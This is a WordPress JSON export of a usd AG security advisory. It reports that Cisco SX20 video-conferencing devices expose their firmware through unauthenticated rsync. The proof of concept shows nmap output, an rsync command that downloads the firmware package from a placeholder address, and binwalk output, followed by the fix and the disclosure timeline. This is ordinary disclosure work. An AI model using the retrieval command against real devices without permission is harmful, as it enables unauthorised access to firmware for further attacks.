{"id":16589,"date":"2021-07-08T10:46:06","date_gmt":"2021-07-08T08:46:06","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2018-0035\/"},"modified":"2021-07-19T14:10:06","modified_gmt":"2021-07-19T12:10:06","slug":"usd-2018-0035","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2018-0035\/","title":{"rendered":"usd-2018-0035"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<h1 class=\"h-custom-headline usd-small-letters h2\"><span>usd-2018-0035 | Cisco Unified Communications Manager (CallManager)\/11.5.1.15900-18 (likely in all versions)<\/span><\/h1>\n<p><span><\/span><strong>Advisory ID<\/strong><span>: usd-2018-0035<\/span><br \/><strong>CVE Number<\/strong><span>: N\/A<\/span><br \/><strong>Affected Product<\/strong><span>: Unified Communications Manager<\/span><br \/><strong>Affected Version<\/strong><span>: 11.5.1.15900-18 (likely in all versions)<\/span><br \/><strong>Vulnerability Type<\/strong><span>: Exposure of Sensitive Configuration Data<\/span><br \/><strong>Security Risk<\/strong><span>: Medium<\/span><br \/><strong>Vendor URL<\/strong><span>: <\/span><a href=\"https:\/\/www.cisco.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cisco.com<\/a><br \/><strong>Vendor Status<\/strong><span>: \u201eis not considered to be an exposure\u201c<\/span><\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p>usd discovered that Cisco SX20 devices allow attackers on the local network to download firmware using rsync without prior authentication. 
Access to the firmware enables attackers to specifically search for additional vulnerabilities within source code and configuration files.<\/p>\n<p>The Cisco SX20 TelePresence Quick is a set of devices that can be used for video conferencing. Typically, they are paired with a screen (e.g. a TV). The SX20 needs to connect to a local network to handle calls and exchange configuration data with the back-end (e.g. the Cisco UCM CallManager). This exposes the device to attackers on the local network.<\/p>\n<h3><\/h3>\n<h3>Proof of Concept (PoC)<\/h3>\n<p>Let 10.10.10.10 be the IP address of an SX20 device.<\/p>\n<p>An nmap scan identifies the following open services:<\/p>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]4043\/tcp  open  rsync           (protocol version 29)<br \/>\n4045\/tcp  open  lockd?<br \/>\n| fingerprint-strings:<br \/>\n|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, HTTPOptions, Kerberos, LPDString, NULL, TLSSessionReq, TerminalServer:<br \/>\n|     version: ce9.4.1 6ae80e1f2ee 2018-08-14<br \/>\n|     method: rsync<br \/>\n|     url: rsync:\/\/[::ffff:10.10.10.10]:4043\/idefix\/idefix.pkg<br \/>\n|_    targets: 102300-3,102310-0,102310-1,101282-0<\/code><\/pre>\n<div class=\"x-text\"><\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"x-text\">\n<p>The following command will download the idefix.pkg file advertised by TCP port 4045:<br \/># rsync rsync:\/\/[::ffff:10.10.10.10]:4043\/idefix\/idefix.pkg .<\/p>\n<p>Using binwalk, the file is identified as a firmware package:<br \/># binwalk idefix.pkg<\/p>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]DECIMAL       HEXADECIMAL     DESCRIPTION<br 
\/>\n--------------------------------------------------------------------------------<br \/>\n3487          0xD9F           PEM certificate<br \/>\n7324          0x1C9C          Executable script, shebang: \"\/bin\/sh\"<br \/>\n13549         0x34ED          Unix path: \/sys\/class\/i2c-adapter\/i2c-4\/4-0054\/eeprom@101:16<br \/>\n13613         0x352D          Unix path: \/sys\/class\/i2c-adapter\/i2c-4\/4-0054\/eeprom@96:5<br \/>\n13672         0x3568          Unix path: \/sys\/class\/gpio\/gpio137\/value<br \/>\n13808         0x35F0          Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 44345388 bytes, 5207 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:16:20<br \/>\n44361273      0x2A4E639       uImage header, header size: 64 bytes, header CRC: 0x850DC982, created: 2018-01-22 11:38:34, image size: 210044 bytes, Data Address: 0x80E80000, Entry Point: 0x80E80000, data CRC: 0xEEA65CCC, OS: Firmware, CPU: ARM, image type: Firmware Image, compression type: none, image name: \"CISCO firmware 32\"<br \/>\n44496781      0x2A6F78D       CRC32 polynomial table, little endian<br \/>\n44505174      0x2A71856       Android bootimg, kernel size: 1684103680 bytes, kernel addr: 0x616D6920, ramdisk size: 1830839655 bytes, ramdisk addr: 0x63696761, product name: \"oo long\"<br \/>\n44607241      0x2A8A709       CRC32 polynomial table, little endian<br \/>\n44612405      0x2A8BB35       uImage header, header size: 64 bytes, header CRC: 0xC37A01BA, created: 2018-06-05 12:33:35, image size: 20337280 bytes, Data Address: 0x0, Entry Point: 0x0, data CRC: 0xFCCAACDC, OS: Linux, CPU: ARM, image type: RAMDisk Image, compression type: gzip, image name: \"CISCO ramdisk 20180605-3a15e0444CertISW\"<br \/>\n44613317      0x2A8BEC5       gzip compressed data, from Unix, last modified: 2018-06-05 12:33:25<br \/>\n64949749      0x3DF0DF5       uImage header, header size: 64 bytes, header CRC: 0x1D587465, created: 2018-06-05 12:33:41, image size: 3791880 bytes, 
Data Address: 0x80008000, Entry Point: 0x80008000, data CRC: 0xC48327A1, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: \"CISCO kernel 20180605-3a15e04445CertISW\"<br \/>\n64967148      0x3DF51EC       gzip compressed data, maximum compression, from Unix, NULL date (1970-01-01 00:00:00)<br \/>\n68741741      0x418EA6D       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 20941005 bytes, 878 inodes, blocksize: 131072 bytes, created: 2018-06-05 12:51:34<br \/>\n89684647      0x5587AA7       Squashfs filesystem, little endian, version 4.0, compression:gzip, size: 553758 bytes, 192 inodes, blocksize: 131072 bytes, created: 2018-08-14 13:10:39<\/code><\/pre>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" custom_margin=\"||27px||false|false\"]<\/p>\n<div class=\"e11191-12 x-container max width\">\n<div class=\"e11191-13 x-column x-sm x-1-1\">\n<div class=\"x-text\">\n<p>Please note that at the time of writing, usd AG has not performed any additional firmware analysis.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"e11191-20 x-container max width\">\n<div class=\"e11191-21 x-column x-sm x-1-1\"><\/div>\n<\/div>\n<p>[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n<div class=\"e16902-22 x-container max width\">\n<div class=\"e16902-23 x-column x-sm x-1-1\">\n<h3>Fix<\/h3>\n<p><span>Enable authentication for the rsync service or disable it if possible.<\/span><\/p>\n<h3><\/h3>\n<h3>Timeline<\/h3>\n<ul>\n<li>2018-10-31 Advisory has been sent to psirt@cisco.com<\/li>\n<li>2018-11-07 Cisco states that they do not consider this to be an exposure<\/li>\n<li>2018-11-09 extended public disclosure deadline to 2019-01-23<\/li>\n<li>2019-01-23 Security advisory released<\/li>\n<\/ul>\n<h3><\/h3>\n<h3>Credits<\/h3>\n<p><span>This security vulnerability was discovered by Marcus 
Gruber and Maximilian Boehner of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2018-0035 | Cisco Unified Communications Manager (CallManager)\/11.5.1.15900-18 (likely in all versions) Advisory ID: usd-2018-0035CVE Number: N\/AAffected Product: Unified Communications ManagerAffected Version: 11.5.1.15900-18 (likely in all versions)Vulnerability Type: Exposure of Sensitive Configuration DataSecurity Risk: MediumVendor URL: https:\/\/www.cisco.comVendor Status: \u201eis not considered to be an exposure\u201c Description usd discovered that Cisco SX20 devices allow attackers on the [&hellip;]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16589","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16589"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16589\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}